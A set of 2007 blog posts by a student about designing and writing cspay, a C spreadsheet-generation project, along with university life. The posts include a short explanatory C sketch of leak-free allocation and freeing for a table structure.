Everyone is very excited and we’ve already outlined a brief design: a C library for reading a configuration file and actually outputting the spreadsheets, a (probably PHP, which I’m not happy about) web interface, a minimal, console based program, which will be called by the web interface, and classic, offline programs for both Windows and Linux. We are considering GTK or wxWidgets. The latter looks better, but I’m reluctant to use C++ and it has no C bindings. The spreadsheets will be XML-based, using ODF and Open Office XML, but we’re planning to keep the config file simple (no XML, as parsing it would probably be harder than generating the documents).
For the moment, we still need to find a name, although a mailing list is in place. A wiki and versioning system will follow. I’ve chosen to read up on creating dynamic libraries and to think about the configuration and console program format. Razvan also suggested using a lexer, which is an entirely new concept to me (actually it was until a couple of hours ago).
Amazing how much a little planning can save; we probably would have switched ideas a lot of times and still wouldn’t have come up with a design close to this one. Still, as good as it seems, it will probably be subject to change once coding gets off the ground.

by Vlad Dogaru on 11 November 2007 12:10 PM
We now have a name for the previously-unnamed-project: cspay. I prefer not to capitalize it, although some of my friends write it as CSpay or CSPay. The meeting today was fruitful and quite fun, with delightfully opposing opinions between the C guys (me, Razvan and Luci) and PHP folks (Alex and Mihai). Roxi and Andrei (andrew, whatever…) took a strategically quiet position, probably snickering at our endless quarrels. However, had we agreed on things from the start, it would surely have been a wrong design; hence the long discussion about the inner workings of our project was beneficial, or so I like to believe.
I got the task of designing a structure that represents a spreadsheet, and then writing the lowest of the libraries, converting that structure to an XML file. Not a particularly challenging task, algorithmically speaking, but interesting nevertheless. After the aforementioned hour-long discussion, we settled that the PHP scripts would also read the master configuration file. Thus, we will write code that does the same thing twice: in PHP and in C. I’m not quite happy about that, but the alternative was getting really complicated; not complex, but complicated. And that I want to stay away from.
Once the name had been decided, Mihai wrote a simple and surprisingly functional IMO sketch, and Razvan quickly provided the space for it and a development wiki. Things are getting going, with most of the initial setup in place, save for a RCS. But we haven’t written any code yet (and will not do so at least for another week probably), so that is a non-issue.
We found an ini parser for C, and there is a link for one in PHP on the wiki, so we are looking towards a simple ini file for the configuration. We also found xmlindent, which is unmaintained (apparently died at 0.2.17 a couple of years ago), but functional and useful; we are thinking of adopting or perhaps forking the project as a side-task, maybe in the long run.
Things are exciting, and I hope they will stay that way — I am close to the usual “screw it all” phase of any project I start working on, but hopefully everyone will motivate each other.

by Vlad Dogaru on 11 November 2007 12:09 PM
Because cspay planning is advancing steadily (or so it seems to me), Razvan installed Subversion. It proved to be quite tricky, though. It’s probably a security measure, but a “plain” Subversion repository (one where only a plain svnadmin create was run) cannot handle multiple users. So we spent about two days experimenting with it, until Razvan finally set the right permissions for the folder (his time is even more limited than ours, obviously). I wrote a quick post-commit email notification script in bash (wow, surprisingly, I could do that). All that remains right now is to actually start coding: I should write the base for libspreadconv, the bottom library which creates an OpenOffice XML spreadsheet from a generic structure (which should be decided upon). There is a lot of reading to be done and very little time, with late mid-terms and all.
Exciting, yes. Tiresome, you bet.

by Vlad Dogaru on 11 November 2007 12:09 PM
I actually wrote my first lines of code for cspay these days, but they were mere headers for the library I am writing. I started reading parts of the standard and making a rough sketch of what will have to be included in an ods file; the standard is huge, but hopefully things can be simplified to a bare minimum, stock proto-spreadsheet. I am having difficulties deciding what to take for granted and what to expect from the user. libspreadconv has to strike a balance between being easy to use and widely applicable; so, while we have to be able to customise styles, they shouldn’t have to be specified if one wants a plain sheet. I will probably ask my friends for help on the mailing list.
In a totally different direction, I took part in some student events whose names I can’t really translate into English. One was in Physics, about the quantity of information transmitted by measurements (again, translation may have ruined the meaning), and the other in Mathematics, about the coding of information by neuronal spike trains. The latter was slightly more interesting, but we only had to do a translation, and the professor practically forced it down our throats. All in all, both events were useful and fairly exciting (intellectually, mind you).
I also helped RobyC with a very interesting piece of homework: compressing a bmp file into jpeg. Most of the program was already done, including the headers and file input and output; all we had to do was encode the information. This proved difficult because we had not read the homework specification thoroughly enough. We spent hours debugging, with hex editors and all, only to have someone point out a detail which we had left out. Infinitely stressful, especially since I had an exam the following day, but also very interesting; you kind of get that warm feeling of accomplishment when you see it’s actually a standards-compliant jpeg file.
Busy as I was, I got into some serious Armagetron Advanced with the boys these days, causing me to see coloured walls in my sleep and to miss this morning’s Data Structures course, which I heard was surprisingly interesting. Heading home tomorrow, with that guilty feeling of leaving Roxi behind and skipping two days of school, but also happy I’ll finally get to see my family (6 weeks is apparently quite a lot by my standards). I’ll have a lot of work to do for Numerical Methods and other projects when I return, but I have to get it over with somehow.
Damn anal wordpress added extra line breaks and my text (pasted from vim) looked like shite.

by Vlad Dogaru on 11 November 2007 12:09 PM
I took advantage of the upcoming exam in Data Structures (I didn’t study for this one) to get some work done on my part of cspay. Libspreadconv is the part that converts a data structure (which I have defined) into an ods spreadsheet. The current implementation is incomplete (even the final version will be incomplete, but this is a subset of the subset) and probably extremely buggy — I can’t read valgrind output, but it does say that a lot of bytes have been lost and this can’t be good. I’m starting to have second thoughts about the way I’ve implemented certain things, so I should probably change them while the library is still not used by anyone. I also want to learn a bit of valgrind and clean up things. Bottom line: the current version is sloppy, slow, buggy and incomplete, but it was quite amazing to run the output through a validator, see it turned out ok, then to actually witness OpenOffice.org display what I intended.
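Valgrind's "lost" bytes are heap blocks that were allocated and never freed. A common way to keep them in check is to give each structure one constructor and one matching destructor that releases everything the structure owns. The sketch below shows that pattern in C under assumed names (`struct table`, `table_new`, `table_set`, `table_free`); it is not the actual libspreadconv layout or API.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical structure: the table owns a private copy of every string. */
struct table {
    size_t rows;
    size_t cols;
    char **cells; /* rows * cols entries; NULL marks an empty cell */
};

/* Allocate an empty table; returns NULL if memory runs out. */
struct table *table_new(size_t rows, size_t cols)
{
    size_t count = rows * cols; /* sketch: overflow is not checked */
    struct table *t = malloc(sizeof *t);

    if (t == NULL)
        return NULL;
    t->rows = rows;
    t->cols = cols;
    t->cells = malloc((count ? count : 1) * sizeof *t->cells);
    if (t->cells == NULL) {
        free(t); /* do not leak the header on partial failure */
        return NULL;
    }
    for (size_t i = 0; i < count; i++)
        t->cells[i] = NULL;
    return t;
}

/* Store a copy of text at (r, c); returns 0 on success, -1 on error. */
int table_set(struct table *t, size_t r, size_t c, const char *text)
{
    size_t n;
    char *copy;

    assert(t != NULL && text != NULL);
    if (r >= t->rows || c >= t->cols)
        return -1;
    n = strlen(text) + 1;
    copy = malloc(n);
    if (copy == NULL)
        return -1;
    memcpy(copy, text, n);
    free(t->cells[r * t->cols + c]); /* release the old value, if any */
    t->cells[r * t->cols + c] = copy;
    return 0;
}

/* Release every cell, then the cell array, then the table itself. */
void table_free(struct table *t)
{
    if (t == NULL)
        return;
    for (size_t i = 0; i < t->rows * t->cols; i++)
        free(t->cells[i]);
    free(t->cells);
    free(t);
}
```

Forgetting the `free` of the old value in `table_set` is the kind of slip that shows up as lost bytes: each overwrite would strand the previous string.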
A large part of the code I wrote is actually comments, but I like the way Doxygen spat them out. Right now, however, I have a (repeating myself) small, sloppy library with few routines and clumsy comments. But it’s a start. I think.
I’ve also been playing a game these days — the Romanian equivalent of TribalWars[1]. Sure it’s silly and time-consuming, but right now I _have_ time. When things change (or the game gets harder), I’ll probably quit, like I did with Utopia and the Blue Gecko games.
[1] http://www.triburile.ro/43827.html

by Vlad Dogaru on 11 November 2007 12:09 PM
10 November 2007
Things have been busy lately and I haven’t really been in the mood to blog. A quick recap of what I can remember:
- wrote a small part of World of USO (in Romanian, not open to the public). This was awesome — using C and flex to parse some data and then update a MySQL table. World of USO is educational software integrated with Moodle, but it’s really very closely linked to the “Usage of Operating Systems” course I had last year (approximate translation).
- got my driver’s license. Hate every single moment while driving. Luckily I don’t own or need a car.
- school started. Electronics is a pain, but otherwise things are all interesting. Assembly, Java, algorithm analysis, systems theory and electronics pretty much sum it up. Philosophy is the odd one out and it’s nothing like it should be.
- helped Răzvan with organising the ACM 2007 Eastern Europe contest. Things were insane: interesting people and new challenges.
- trying to learn Haskell. It’s above all other programming languages I’ve seen. Simple, but far from easy.
- starting Hammerfall (working title, partly Romanian, might not be online at the time of this writing). It’s an attempt at a graphics engine based on OpenGL; after finishing it, we plan a game. Things are now very uncertain: we don’t even know what language we will use.
- almost forgot: cspay is fully working; a lot of work from Lucian got us spitting out xls files. Sure, it probably still has bugs, but things are pretty much on track with cspay.
- Rosedu is getting things moving: freshmen joining, new project ideas, a facelift for the website, new forums, Planet Rosedu. The latter is an awesome idea. Be warned that most of the content on Rosedu is in Romanian and we intend to keep it that way; only the software will (hopefully) be in English. Rosedu is education-, FLOSS-, and Romania-oriented. The latter speaks for itself.

by Vlad Dogaru on 10 November 2007 01:49 PM